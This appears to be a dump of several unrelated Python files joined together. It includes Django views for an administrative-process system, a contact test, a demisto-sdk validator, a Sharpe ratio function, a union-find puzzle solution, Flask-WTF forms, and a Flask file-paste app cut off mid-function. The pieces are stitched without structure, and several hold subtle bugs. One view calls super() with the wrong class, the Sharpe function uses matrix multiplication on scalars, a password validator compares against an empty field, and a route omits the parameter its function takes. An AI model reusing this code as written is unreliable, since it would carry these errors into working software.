super(OfInternoAdmDataEnvioView, self).form_valid(form) def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) editar_dataenvio_adm = OfInternoAdmDataEnvioView.as_view() class OfExternoAdmCreateView(OfExternoMixin, AtoAdmCreateView): model = OficioExternoAdm form_class = OficioExternoAdmForm subtitle = "Adicionar Ofício Recebido" def form_valid(self, form): self.set_instance_form(form) return super(OfExternoAdmCreateView, self).form_valid(form) add_ofexterno_adm = OfExternoAdmCreateView.as_view() class OfExternoAdmUpdateView(LoginRequiredMixin, OfExternoMixin, AtoAdmUpdateView): model = OficioExternoAdm form_class = OficioExternoAdmForm subtitle = "Modificar Ofício Recebido" def form_valid(self, form): data = {x: valor for x, valor in form.cleaned_data.items() if valor is not None and valor is not False and valor != ''} data['modificador'] = self.request.user OficioExternoAdm.objects.filter(pk=self.kwargs['pk']).update(**data) return HttpResponseRedirect(self.get_success_url()) def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) editar_ofexterno_adm = OfExternoAdmUpdateView.as_view() class DespachoAdmCreateView(DespachoMixin, AtoAdmCreateView): model = DespachoAdm form_class = DespachoAdmForm path_to_include = 'componentes/shares/CKDespachoGeral.html' subtitle = 'Cadastrar Despacho' def get(self, request, *args, **kwargs): obj = get_object_or_404(Administrativo, pk=self.kwargs['pk']) if verifica_direcao(request, GRUPO_SUPERIOR_ADMINISTRATIVO): if obj.arquivar is False: return super(DespachoAdmCreateView, self).get(request, *args, **kwargs) else: return redirect('core:arquivado') else: raise PermissionDenied def form_valid(self, form): self.set_instance_form(form) return super(DespachoAdmCreateView, self).form_valid(form) add_despacho_adm = DespachoAdmCreateView.as_view() class DespachoAdmUpdateView(LoginRequiredMixin, DespachoMixin, AtoAdmUpdateView): model = DespachoAdm form_class = DespachoAdmForm path_to_include = 'componentes/shares/CKDespachoEditar.html' subtitle = 'Editar Despacho' def get_queryset(self): queryset = super(DespachoAdmUpdateView, self).get_queryset() queryset = queryset.filter(autor=self.request.user) return queryset def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) def form_valid(self, form): form.instance.modificador = self.request.user return super(DespachoAdmUpdateView, self).form_valid(form) editar_despacho_adm = DespachoAdmUpdateView.as_view() class StatusAdmCreateView(AtoAdmCreateView): model = StatusAdm form_class = StatusAdmForm template_name = 'componentes/shares/FormGeral.html' def get_context_data(self, **kwargs): context = super(StatusAdmCreateView, self).get_context_data(**kwargs) context['subtitle'] = 'Inserir Status' context['outros_disabled'] = True return context def form_valid(self, form): self.set_instance_form(form) return super(StatusAdmCreateView, self).form_valid(form) add_status_adm = StatusAdmCreateView.as_view() class StatusAdmUpdateView(LoginRequiredMixin, AtoAdmUpdateView): model = StatusAdm form_class = StatusAdmForm template_name = 'componentes/shares/FormGeral.html' def get_context_data(self, **kwargs): context = super(StatusAdmUpdateView, self).get_context_data(**kwargs) context['subtitle'] = 'Inserir Status' context['outros_disabled'] = True return context def form_valid(self, form): form.instance.modificador = self.request.user return super(StatusAdmUpdateView, self).form_valid(form) def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) editar_status_adm = StatusAdmUpdateView.as_view() class GravacaoAdmCreateView(GravacaoMidiaMixin, AtoAdmCreateView): model = MidiaAdm form_class = MidiaAdmForm def form_valid(self, form): self.set_instance_form(form) return super(GravacaoAdmCreateView, self).form_valid(form) add_gravacao_adm = GravacaoAdmCreateView.as_view() class DocumentoCreateView(AtoAdmCreateView): model = DocumentosGeraisAdm form_class = DocumentoAdmForm template_name = 'componentes/shares/FormGeral.html' def get_context_data(self, **kwargs): context = super(DocumentoCreateView, self).get_context_data(**kwargs) context['subtitle'] = 'Adicionar Documento' context['outros_disabled'] = True return context def form_valid(self, form): self.set_instance_form(form) return super(DocumentoCreateView, self).form_valid(form) add_documento_adm = DocumentoCreateView.as_view() class DocumentoUpdateView(LoginRequiredMixin, AtoAdmUpdateView): model = DocumentosGeraisAdm form_class = DocumentoAdmForm template_name = 'componentes/shares/FormGeral.html' def get_context_data(self, **kwargs): context = super(DocumentoUpdateView, self).get_context_data(**kwargs) context['subtitle'] = 'Atualizar Documento-SSP/PI' return context def get_queryset(self): queryset = super(DocumentoUpdateView, self).get_queryset() queryset = queryset.filter(autor=self.request.user) return queryset def form_valid(self, form): data = {x: valor for x, valor in form.cleaned_data.items() if valor is not None and valor is not False and valor != ''} data['modificador'] = self.request.user self.model.objects.filter(pk=self.kwargs['pk']).update(**data) return HttpResponseRedirect(self.get_success_url()) def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) editar_documento_adm = DocumentoUpdateView.as_view() class SelectUserPermissionAdmView(LoginRequiredMixin, OrgaoPermissionRequiredMixin, SelectUserPermissionView): permissoes = PERMISSOES_ADMINISTRATIVO model = Administrativo name_grupo = GRUPO_ADMINISTRATIVO grupo_superior = GRUPO_SUPERIOR_ADMINISTRATIVO orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.view_administrativo' modulo = 'Administrativo' usuarios_externos = False def get_objeto(self): return get_object_or_404(self.model, pk=self.kwargs['pk']) def get_success_url(self): return reverse_lazy('adm:select_perm_adm', kwargs={'pk': self.kwargs['pk']}) select_user_adm = SelectUserPermissionAdmView.as_view() class SelectUserOrgaoExternoAdmView(LoginRequiredMixin, OrgaoPermissionRequiredMixin, SelectUserOrgaoExternoView): permissoes = PERMISSOES_ADMINISTRATIVO model = Administrativo name_grupo = GRUPO_ADMINISTRATIVO grupo_superior = GRUPO_SUPERIOR_ADMINISTRATIVO orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.view_administrativo' modulo = 'Administrativo' usuarios_externos = True def get_objeto(self): return get_object_or_404(self.model, pk=self.kwargs['pk']) def get_success_url(self): return reverse_lazy('adm:select_perm_adm', kwargs={'pk': self.kwargs['pk']}) add_external_users_adm = SelectUserOrgaoExternoAdmView.as_view() class PermissionAdmView(LoginRequiredMixin, OrgaoPermissionRequiredMixin, PermissionView): model = Administrativo permissoes = PERMISSOES_ADMINISTRATIVO grupo_superior = GRUPO_SUPERIOR_ADMINISTRATIVO orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.view_administrativo' def get_objeto(self): return get_object_or_404(self.model, pk=self.kwargs['pk']) def get_success_url(self): return reverse_lazy('adm:detalhe_processo_adm', kwargs={'pk': self.kwargs['pk']}) select_perm_adm = PermissionAdmView.as_view() class AnularAtoView(LoginRequiredMixin, OrgaoPermissionRequiredMixin, UpdateView): model = AtoAdm fields = ['motivo_anulacao'] pk_url_kwarg = 'pk' orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.view_administrativo' def get_object_processo(self): ato = get_object_or_404(self.model, pk=self.kwargs['pk']) return ato.processo def dispatch(self, request, *args, **kwargs): objeto = get_object_or_404(self.model, pk=self.kwargs['pk']) if verifica_direcao(request, GRUPO_SUPERIOR_ADMINISTRATIVO): if objeto.processo.arquivar is False: return super().dispatch(request, *args, **kwargs) else: return redirect('core:arquivado') else: raise PermissionDenied def form_valid(self, form): if form.cleaned_data['motivo_anulacao'] == '': messages.warning(self.request, 'Informe um motivo ao anular um ato') return redirect(self.get_success_url()) self.object.anulado = True self.object.modificador = self.request.user return super().form_valid(form) def get_success_url(self): return reverse_lazy('adm:detalhe_processo_adm', kwargs={'pk': self.object.processo.pk}) anular_ato = AnularAtoView.as_view() class VincularProcessosCreateView(VincularProcessosCreateMixin): model_dispatch = Administrativo group_dispatch = GRUPO_SUPERIOR_ADMINISTRATIVO orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.view_administrativo' def get_success_url(self): obj = get_object_or_404(Administrativo, pk=self.kwargs['pk']) return reverse_lazy('adm:detalhe_processo_adm', kwargs={'pk': obj.pk}) vincular_processos = VincularProcessosCreateView.as_view() class ControlEmpresasCreateView(AtoAdmCreateView): model = ControlEmpresas form_class = ControlEmpresasForm template_name = 'componentes/shares/OficioEmpresas.html' def get_context_data(self, **kwargs): data = super(ControlEmpresasCreateView, self).get_context_data(**kwargs) if self.request.POST: data['oficios'] = OfEmpresasFormset(self.request.POST, form_kwargs=self.get_formset_kwargs()) else: data['oficios'] = OfEmpresasFormset(form_kwargs=self.get_formset_kwargs()) data['oficios_inter'] = True return data def form_valid(self, form): context = self.get_context_data() oficios = context['oficios'] with transaction.atomic(): self.set_instance_form(form) self.object = form.save() if oficios.is_valid(): oficios.instance = self.object oficios.save() return super(ControlEmpresasCreateView, self).form_valid(form) def get_formset_kwargs(self): processo = get_object_or_404(Administrativo, pk=self.kwargs['pk']) return {'orgao_pk': processo.orgao_processo.pk} add_ofempresas = ControlEmpresasCreateView.as_view() class OfEmpresaUpdateViewMixin(OrgaoPermissionRequiredMixin, UpdateView): orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.change_administrativo' ato_update_view = True def get(self, request, *args, **kwargs): obj = get_object_or_404(self.model, pk=self.kwargs['pk']) user_has_perm = self.request.user.has_perm(self.view_permission_required, obj.controlempresas.processo) user_has_authority = verifica_direcao(request, GRUPO_SUPERIOR_ADMINISTRATIVO) if user_has_perm or user_has_authority: if obj.controlempresas.processo.arquivar is False: return super(OfEmpresaUpdateViewMixin, self).get(request, *args, **kwargs) else: return redirect('core:arquivado') else: raise PermissionDenied def get_success_url(self): return reverse_lazy('adm:detalhe_processo_adm', kwargs={'pk': self.object.controlempresas.processo.pk}) class OfEmpresasArquivoUpdateView(LoginRequiredMixin, OfEmpresaUpdateViewMixin): model = OfEmpresas fields = ['arquivo'] template_name = 'componentes/shares/DadosPopup.html' def get_context_data(self, **kwargs): context = super(OfEmpresasArquivoUpdateView, self).get_context_data(**kwargs) context['max_size'] = MAX_FILE_SIZE context['allowed_extensions'] = ALLOWED_EXTENSIONS return context def form_valid(self, form): form.instance.modificador = self.request.user return super(OfEmpresasArquivoUpdateView, self).form_valid(form) ofempresas_upload_arquivo = OfEmpresasArquivoUpdateView.as_view() class OfEmpresaConfirmUpdateView(LoginRequiredMixin, OfEmpresaUpdateViewMixin): model = OfEmpresas fields = ['confirmacao', 'nome_confirm'] template_name = 'componentes/shares/ConfirmacaoPopup.html' def form_valid(self, form): form.instance.modificador = self.request.user return super(OfEmpresaConfirmUpdateView, self).form_valid(form) ofempresas_confirmar = OfEmpresaConfirmUpdateView.as_view() class OfEmpresasUpdateView(LoginRequiredMixin, OfEmpresaUpdateViewMixin): model = OfEmpresas form_class = OfEmpresasUpdateForm template_name = 'componentes/shares/FormGeral.html' def get_context_data(self, **kwargs): data = super(OfEmpresasUpdateView, self).get_context_data(**kwargs) data['processos_css'] = True data['subtitle'] = 'Atualizar Ofício' return data def form_valid(self, form): form.instance.modificador = self.request.user return super(StatusAdmUpdateView, self).form_valid(form) ofempresas_editar = OfEmpresasUpdateView.as_view() 0 # -*- coding: utf-8 -*- from selenium import webdriver import string import pytest import random from model.contact import Contact def test_add_contact(app, json_contact): contact = json_contact old_contact = app.contact.get_contact_list() app.contact.create_new_contact(contact) assert len(old_contact)+1 == app.contact.count() new_contact = app.contact.get_contact_list() old_contact.append(contact) assert sorted(old_contact, key=Contact.id_or_max) == sorted(new_contact, key=Contact.id_or_max) demisto_sdk/commands/common/hook_validations/id.py import os import re from collections import OrderedDict from distutils.version import LooseVersion import click import demisto_sdk.commands.common.constants as constants from demisto_sdk.commands.common.configuration import Configuration from demisto_sdk.commands.common.constants import GENERIC_COMMANDS_NAMES from demisto_sdk.commands.common.errors import Errors from demisto_sdk.commands.common.hook_validations.base_validator import \ BaseValidator from demisto_sdk.commands.common.update_id_set import (get_classifier_data, get_incident_type_data, get_integration_data, get_mapper_data, get_pack_metadata_data, get_playbook_data, get_script_data) from demisto_sdk.commands.unify.yml_unifier import YmlUnifier class IDSetValidations(BaseValidator): """IDSetValidations was designed to make sure all the inter connected content entities are valid. The id_set.json file is created using the update_id_set.py script. It contains all the data from the various executables we have in Content repository - Playbooks/Scripts/Integration. The script extracts the command and script names so we will later on will be able to use it in the test filtering we have in our build system. Attributes: is_circle (bool): whether we are running on circle or local env. id_set (dict): Dictionary that hold all the data from the id_set.json file. script_set (set): Set of all the data regarding scripts in our system. playbook_set (set): Set of all the data regarding playbooks in our system. integration_set (set): Set of all the data regarding integrations in our system. test_playbook_set (set): Set of all the data regarding test playbooks in our system. """ SCRIPTS_SECTION = "scripts" PLAYBOOK_SECTION = "playbooks" INTEGRATION_SECTION = "integrations" TEST_PLAYBOOK_SECTION = "TestPlaybooks" CLASSIFIERS_SECTION = "Classifiers" LAYOUTS_SECTION = "Layouts" MAPPERS_SECTION = "Mappers" INCIDENT_TYPES_SECTION = "IncidentTypes" PACKS_SECTION = "Packs" def __init__(self, is_test_run=False, is_circle=False, configuration=Configuration(), ignored_errors=None, print_as_warnings=False, suppress_print=False, id_set_file=None, json_file_path=None): super().__init__(ignored_errors=ignored_errors, print_as_warnings=print_as_warnings, suppress_print=suppress_print, json_file_path=json_file_path) self.is_circle = is_circle self.configuration = configuration if not is_test_run and self.is_circle: self.id_set_file = id_set_file self.script_set = self.id_set_file[self.SCRIPTS_SECTION] self.playbook_set = self.id_set_file[self.PLAYBOOK_SECTION] self.integration_set = self.id_set_file[self.INTEGRATION_SECTION] self.test_playbook_set = self.id_set_file[self.TEST_PLAYBOOK_SECTION] self.classifiers_set = self.id_set_file[self.CLASSIFIERS_SECTION] self.layouts_set = self.id_set_file[self.LAYOUTS_SECTION] self.mappers_set = self.id_set_file[self.MAPPERS_SECTION] self.incident_types_set = self.id_set_file[self.INCIDENT_TYPES_SECTION] self.packs_set = self.id_set_file[self.PACKS_SECTION] def _is_incident_type_default_playbook_found(self, incident_type_data): """Check if the default playbook of an incident type is in the id_set Args: incident_type_data (dict): Dictionary that holds the extracted details from the given incident type. Returns: bool. Whether the playbook is in the id_set or not. """ is_valid = True incident_type_name = list(incident_type_data.keys())[0] incident_type_playbook = incident_type_data[incident_type_name].get('playbooks') if incident_type_playbook: # setting initially to false, if the default playbook is in the id_set, it will be valid is_valid = False for checked_playbook in self.playbook_set: checked_playbook_name = list(checked_playbook.keys())[0] if incident_type_playbook == checked_playbook_name: is_valid = True break if not is_valid: # add error message if not valid error_message, error_code = Errors.incident_type_non_existent_playbook_id(incident_type_name, incident_type_playbook) if not self.handle_error(error_message, error_code, file_path="id_set.json"): is_valid = True return is_valid def _is_non_real_command_found(self, script_data): """Check if the script depend-on section has a non real command Args: script_data (dict): Dictionary that holds the extracted details from the given script. Returns: bool. Whether the script is valid or not. """ is_valid = True depends_on_commands = script_data.get('depends_on') if depends_on_commands: for command in depends_on_commands: if command != 'test-module': if command.endswith('dev') or command.endswith('copy'): error_message, error_code = Errors.invalid_command_name_in_script(script_data.get('name'), command) if self.handle_error(error_message, error_code, file_path="id_set.json"): return not is_valid return is_valid def _is_integration_classifier_and_mapper_found(self, integration_data): """Check if the integration classifier and mapper are found Args: integration_data (dict): Dictionary that holds the extracted details from the given integration. Returns: bool. Whether the integration fetch incident classifier is found. """ is_valid_classifier = True integration_classifier = integration_data.get('classifiers', '') # there is only 1 classifier per integration if integration_classifier: # setting initially to false, if the classifier is in the id_set, it will be valid is_valid_classifier = False for classifier in self.classifiers_set: checked_classifier_name = list(classifier.keys())[0] if integration_classifier == checked_classifier_name: is_valid_classifier = True break if not is_valid_classifier: # add error message if not valid error_message, error_code = Errors.integration_non_existent_classifier(integration_classifier) if not self.handle_error(error_message, error_code, file_path="id_set.json"): is_valid_classifier = True is_valid_mapper = True integration_mapper = integration_data.get('mappers', [''])[0] # there is only 1 mapper per integration if integration_mapper: # setting initially to false, if the mapper is in the id_set, it will be valid is_valid_mapper = False for mapper in self.mappers_set: checked_mapper_name = list(mapper.keys())[0] if integration_mapper == checked_mapper_name: is_valid_mapper = True break if not is_valid_mapper: # add error message if not valid error_message, error_code = Errors.integration_non_existent_mapper(integration_mapper) if not self.handle_error(error_message, error_code, file_path="id_set.json"): is_valid_mapper = True return is_valid_classifier and is_valid_mapper def _is_classifier_incident_types_found(self, classifier_data): """Check if the classifier incident types were found Args: classifier_data (dict): Dictionary that holds the extracted details from the given classfier. Returns: bool. Whether the classifier related incident types are found. """ is_valid = True classifier_incident_types = set(classifier_data.get('incident_types', set())) if classifier_incident_types: # setting initially to false, if the incident types is in the id_set, it will be valid is_valid = False for incident_type in self.incident_types_set: incident_type_name = list(incident_type.keys())[0] # remove a related incident types if exists in the id_set if incident_type_name in classifier_incident_types: classifier_incident_types.remove(incident_type_name) if not classifier_incident_types: break if not classifier_incident_types: # if nothing remains, these incident types were all found is_valid = True else: # there are missing incident types in the id_set, classifier is invalid error_message, error_code = Errors.classifier_non_existent_incident_types( str(classifier_incident_types)) if not self.handle_error(error_message, error_code, file_path="id_set.json"): is_valid = True return is_valid def _is_mapper_incident_types_found(self, mapper_data): """Check if the classifier incident types were found Args: mapper_data (dict): Dictionary that holds the extracted details from the given mapper. Returns: bool. Whether the classifier related incident types are found. """ is_valid = True mapper_incident_types = set(mapper_data.get('incident_types', set())) if mapper_incident_types: # setting initially to false, if the incident types is in the id_set, it will be valid is_valid = False for incident_type in self.incident_types_set: incident_type_name = list(incident_type.keys())[0] # remove a related incident types if exists in the id_set if incident_type_name in mapper_incident_types: mapper_incident_types.remove(incident_type_name) if not mapper_incident_types: break if not mapper_incident_types: # if nothing remains, these incident types were all found is_valid = True else: # there are missing incident types in the id_set, mapper is invalid error_message, error_code = Errors.mapper_non_existent_incident_types(str(mapper_incident_types)) if not self.handle_error(error_message, error_code, file_path="id_set.json"): is_valid = True return is_valid def _are_playbook_entities_versions_valid(self, playbook_data, file_path): """Check if the playbook's version match playbook's entities (script , sub-playbook, integration) Args: playbook_data (dict): Dictionary that holds the extracted details from the given playbook. file_path (string): Path to the file (current playbook). Returns: bool. Whether the playbook's version match playbook's entities. """ playbook_data_2nd_level = playbook_data.get(list(playbook_data.keys())[0]) playbook_name = playbook_data_2nd_level.get("name") playbook_version = playbook_data_2nd_level.get("fromversion") playbook_scripts_list = playbook_data_2nd_level.get("implementing_scripts", []) sub_playbooks_list = playbook_data_2nd_level.get("implementing_playbooks", []) playbook_integration_commands = self.get_commands_to_integration(playbook_name, file_path) if not self.is_entity_version_match_playbook_version(sub_playbooks_list, playbook_version, self.playbook_set, playbook_name, file_path): return False if not self.is_entity_version_match_playbook_version(playbook_scripts_list, playbook_version, self.script_set, playbook_name, file_path): return False if not self.is_playbook_integration_version_valid(playbook_integration_commands, playbook_version, playbook_name, file_path): return False return True def is_subplaybook_name_valid(self, playbook_data, file_path): """Checks whether a sub playbook name is valid (i.e id exists in set_id) Args: playbook_data (dict): Dictionary that holds the extracted details from the given playbook. {playbook name: playbook data (dict)} file_path (string): Path to the file (current playbook). Return: bool. if all sub playbooks names of this playbook are valid. """ # Get a dict with all playbook fields from the playbook data dict. playbook_data_2nd_level = playbook_data.get(list(playbook_data.keys())[0]) main_playbook_name = playbook_data_2nd_level.get("name") sub_playbooks_list = playbook_data_2nd_level.get("implementing_playbooks", []) for playbook_dict in self.playbook_set: playbook_name = list(playbook_dict.values())[0].get('name') if playbook_name in sub_playbooks_list: sub_playbooks_list.remove(playbook_name) if sub_playbooks_list: error_message, error_code = Errors.invalid_subplaybook_name(sub_playbooks_list, main_playbook_name) if self.handle_error(error_message, error_code, file_path): return False return True def get_commands_to_integration(self, file_name, file_path): """ gets playbook's 'command_to_integration' dict from playbook set in id_set file. Args: file_name (string): Name of current playbook. file_path (string): : Path to the playbook file. Returns: dictionary. Playbook's 'command_to_integration' dict. """ commands_to_integration = {} for playbook_dict in self.playbook_set: playbook_name = list(playbook_dict.keys())[0] playbook_path = playbook_dict[playbook_name].get("file_path") is_this_the_playbook = playbook_name == file_name and file_path == playbook_path if is_this_the_playbook: playbook_data = playbook_dict[playbook_name] commands_to_integration = playbook_data.get("command_to_integration", {}) return commands_to_integration return commands_to_integration def is_entity_version_match_playbook_version(self, implemented_entity_list_from_playbook, main_playbook_version, entity_set_from_id_set, playbook_name, file_path): """Check if the playbook's version match playbook's entities (script or sub-playbook) Goes over the relevant entity set from id_set and check if the version of this entity match is equal or lower to the main playbook's version. For example, for given scripts list : implemented_entity_list_from_playbook = ["script1", "script2"], main playbook version = "5.0.0". This code searches for script1 version in the scripts set (in id_set) and returns True only if script1 version <= "5.0.0." (main playbook version), otherwise returns False. Does the same for "script2". Args: implemented_entity_list_from_playbook (list): List of relevant entities yo check from playbook. For example, list of implementing_scripts or list of implementing_playbooks. main_playbook_version (str): Playbook's from version. entity_set_from_id_set (dict) : Entity's data set (scripts or playbooks) from id_set file. playbook_name (str) : Playbook's name. file_path (string): Path to the file (current playbook). Returns: bool. Whether the playbook's version match playbook's entities. """ for entity_data_dict in entity_set_from_id_set: if not implemented_entity_list_from_playbook: return True entity_id = list(entity_data_dict.keys())[0] all_entity_fields = entity_data_dict[entity_id] entity_name = entity_id if entity_id in implemented_entity_list_from_playbook else all_entity_fields.get( "name") is_entity_used_in_playbook = entity_name in implemented_entity_list_from_playbook if is_entity_used_in_playbook: entity_version = all_entity_fields.get("fromversion", "") is_version_valid = not entity_version or LooseVersion(entity_version) <= LooseVersion( main_playbook_version) if is_version_valid: implemented_entity_list_from_playbook.remove(entity_name) if implemented_entity_list_from_playbook: error_message, error_code = Errors.content_entity_version_not_match_playbook_version( playbook_name, implemented_entity_list_from_playbook, main_playbook_version) if self.handle_error(error_message, error_code, file_path): return False return True def is_playbook_integration_version_valid(self, playbook_integration_commands, playbook_version, playbook_name, file_path): """Check if the playbook's version match playbook's used integrations. Goes over all the integrations' commands that used in the current playbook. For each command, checks its integration's from version. If at least one existing integration was found that integration version <= playbook version, True is returned. If no such integration was found, False returned. Args: playbook_integration_commands (dict): Playbook's 'command_to_integration' dict. playbook_version (str): Playbook's from version . playbook_name (str) : Playbook's name . file_path (string): Path to the file (current playbook) . Returns: bool. Whether the playbook's version match playbook's used integrations. """ for command in playbook_integration_commands: implemented_integrations_list = playbook_integration_commands[command] # Ignore the error for PB with generic commands that do not depend on specific integration if command in GENERIC_COMMANDS_NAMES and not implemented_integrations_list: continue integration_from_valid_version_found = False for integration in implemented_integrations_list: integration_version = self.get_integration_version(integration) is_version_valid = not integration_version or LooseVersion(integration_version) <= LooseVersion( playbook_version) if is_version_valid: integration_from_valid_version_found = True break if not integration_from_valid_version_found: error_message, error_code = Errors.integration_version_not_match_playbook_version(playbook_name, command, playbook_version) if self.handle_error(error_message, error_code, file_path): return False return True def get_integration_version(self, integration_to_search): general_version = "" # i.e integration has no specific version for integration_dict in self.integration_set: integration_name = list(integration_dict.keys())[0] if integration_name == integration_to_search: integration_data = integration_dict[integration_name] return integration_data.get("fromversion", "") return general_version def is_file_valid_in_set(self, file_path, file_type, ignored_errors=None): """Check if the file is valid in the id_set Args: file_path (string): Path to the file. file_type (string): The file type. ignored_errors (list): a list of ignored errors for the specific file Returns: bool. Whether the file is valid in the id_set or not. """ self.ignored_errors = ignored_errors is_valid = True if self.is_circle: # No need to check on local env because the id_set will contain this info after the commit click.echo(f"id set validations for: {file_path}") if re.match(constants.PACKS_SCRIPT_YML_REGEX, file_path, re.IGNORECASE): unifier = YmlUnifier(os.path.dirname(file_path)) yml_path, code = unifier.get_script_or_integration_package_data() script_data = get_script_data(yml_path, script_code=code) is_valid = self._is_non_real_command_found(script_data) elif file_type == constants.FileType.INCIDENT_TYPE: incident_type_data = OrderedDict(get_incident_type_data(file_path)) is_valid = self._is_incident_type_default_playbook_found(incident_type_data) elif file_type == constants.FileType.INTEGRATION: integration_data = get_integration_data(file_path) is_valid = self._is_integration_classifier_and_mapper_found(integration_data) elif file_type == constants.FileType.CLASSIFIER: classifier_data = get_classifier_data(file_path) is_valid = self._is_classifier_incident_types_found(classifier_data) elif file_type == constants.FileType.MAPPER: mapper_data = get_mapper_data(file_path) is_valid = self._is_mapper_incident_types_found(mapper_data) elif file_type == constants.FileType.PLAYBOOK: playbook_data = get_playbook_data(file_path) playbook_answers = [self._are_playbook_entities_versions_valid(playbook_data, file_path), self.is_subplaybook_name_valid(playbook_data, file_path)] is_valid = all(playbook_answers) return is_valid def _is_pack_display_name_already_exist(self, pack_metadata_data): """Check if the pack display name already exists in our repo Args: pack_metadata_data (dict): Dictionary that holds the extracted details from the given metadata file. Returns: bool. Whether the metadata file is valid or not. """ new_pack_folder_name = list(pack_metadata_data.keys())[0] new_pack_name = pack_metadata_data[new_pack_folder_name]['name'] for pack_folder_name, pack_data in self.packs_set.items(): if new_pack_name == pack_data['name'] and new_pack_folder_name != pack_folder_name: return False, Errors.pack_name_already_exists(new_pack_name) return True, None def is_unique_file_valid_in_set(self, pack_path, ignored_errors=None): """Check if unique files are valid against the rest of the files, using the ID set. Args: pack_path (string): Path to the file. ignored_errors (list): a list of ignored errors for the specific file Returns: bool. Whether the file is valid in the id_set or not. string. Error massage if the file is invalid else None. """ self.ignored_errors = ignored_errors is_valid = True error = None if self.is_circle: click.echo(f"id set validations for: {pack_path}") is_valid, error = self._is_pack_display_name_already_exist( get_pack_metadata_data(f'{pack_path}/pack_metadata.json', False)) return is_valid, error functions_legacy/SharpeRatio.py1-10 from numpy import std, mean def SharpeRatio(h,PL,r,v0): # This function computes the Sharpe ratio = (E[Pi_h]-r@v0)/Std[Pi_h] of a portfolio once we know # the risk-free rate r and the current budget v0. # INPUTS: # h :[vector](n_ x 1) holdings # PL : [matrix] (n_ x j_) scenarios for the P&L's of the n_ fizeroscial instruments in the portfolio # r :[scalar] risk-free rate # v0 :[scalar] budget # OP: # ratio :[scalar] Sharpe ratio Pi_h=h.T@PL ExcessPi_h=Pi_h-r@v0 E=mean(ExcessPi_h) Sd=std(Pi_h) ratio=E/Sd return ratio solutions/684/684-yongjoonseo.py1-10 # check # return the answer that occurs last class Solution: def find(self, x, parents): if parents[x] == x: return x parents[x] = self.find(parents[x], parents) return parents[x] def union(self, x, y, parents, ranks): xr = self.find(x, parents) yr = self.find(y, parents) if ranks[xr] >= ranks[yr]: parents[yr] = xr else: parents[xr] = yr if ranks[xr] == ranks[yr]: ranks[xr] += 1 def findRedundantConnection(self, edges: List[List[int]]) -> List[int]: N = len(edges) parents = [i for i in range(N+1)] ranks = [0] * (N+1) result = None for u, v in edges: if self.find(u, parents) == self.find(v, parents): result = (u, v) else: self.union(u, v, parents, ranks) return resultblog/forms.py from flask_wtf import Form from wtforms import TextField, TextAreaField, FloatField, PasswordField, FileField from wtforms import validators from wtforms import ValidationError from .models import User class LoginForm(Form): username = TextField(u'Username', validators=[validators.required()]) password = PasswordField(u'Password', validators=[validators.required()]) def validate(self): check_validate = super(LoginForm, self).validate() # Make sure the input was clean if not check_validate: return False user = User.query.filter_by(username=self.username.data).first() if not user: self.username.errors.append('Invalid username or password') return False elif not user.check_password(self.password.data): self.username.errors.append('Invalid username or password') return False return True class NewUserForm(Form): username = TextField(u'Username') email = TextField(u'Email', validators=[validators.email()]) password = PasswordField(u'Password', validators=\ [validators.EqualTo('', message='Passwords must match.'),\ validators.length(6,64)]) password2 = PasswordField(u'') def validate_username(self, field): if User.query.filter_by(username=field.data).first(): raise ValidationError('Username not available') def validate_email(self, field): if User.query.filter_by(email=field.data).first(): raise ValidationError('Email address not available') def validate(self): check_validate = super(NewUserForm, self).validate() # Make sure the input was clean if not check_validate: return False return True class EditProfileForm(Form): username = TextField(u'Username') email = TextField(u'Email', validators=[validators.email()]) password = PasswordField(u'Password', validators=\ [validators.EqualTo('', message='Passwords must match.'),\ validators.length(6,64)]) password2 = PasswordField(u'') api_key = TextField(u'API Key') def validate(self): check_validate = super(EditProfileForm, self).validate() # Make sure the input was clean if not check_validate: return False return True class CreatePostForm(Form): title = TextField(u'Title', validators=[validators.required(), validators.length(max=256)]) text = TextAreaField(u'Content', validators=[validators.required()]) latitude = FloatField(u'Latitude', validators=[validators.required()]) longitude = FloatField(u'Longitude', validators=[validators.required()]) def validate(self): check_validate = super(CreatePostForm, self).validate() # Make sure the input was clean if not check_validate: return False return True class CreateImageForm(Form): title = TextField(u'Title', validators=[validators.required(), validators.length(max=256)]) image = FileField(u'Image', validators=[validators.required()]) caption = TextAreaField(u'Caption', validators=[validators.required(), validators.length(max=512)]) latitude = FloatField(u'Latitude') longitude = FloatField(u'Longitude') def validate(self): check_validate = super(CreateImageForm, self).validate() # Make sure the input was clean if not check_validate: return False return True 0 #!/usr/bin/env python # -*- coding:utf-8 -*- import os from flask import Flask, abort, request, jsonify, redirect, render_template from ext import db, mako from models import PasteFile from libs.utils import humanize_bytes, get_file_path app = Flask(__name__) app.config.from_object('config') mako.init_app(app) db.init_app(app) @app.route('/r/') def rsize(img_hash): w = request.args['w'] h = request.args['h'] old_paste = PasteFile.get_by_filehash(img_hash) new_paste = PasteFile.rsize(old_paste, w, h) return new_paste.url_i @app.route('/', methods=['GET', 'POST']) def index(): if request.method == 'POST': uploaded_file = request.files['file'] w = request.form.get('w') h = request.form.get('h') if not uploaded_file: return abort(404) if w and h: paste_file = PasteFile(uploaded_file, w, h) else: paste_file = PasteFile.create_by_upload(uploaded_file) db.session.add(paste_file) db.session.commit() return jsonify({ 'url_d': paste_file.url_d, 'url_i': paste_file.url_i, 'url_s': paste_file.url_s, 'url_p': paste_file.url_p, 'filename': paste_file.filename, 'size': humanize_bytes(paste_file.size), 'time': str(paste_file.uploadtime), 'type': paste_file.type, 'quoteurl': paste_file.quoteurl }) return render_template('index.html', **locals()) @app.after_request def after_request(response): response.headers['Access-Control-Allow-Origin'] = '*' response.headers['Access-Control-Allowe-Headers'] = 'Content-Type' return response @app.route('/j', methods=['POST']) def j(): uploaded_file = request.files['file'] if 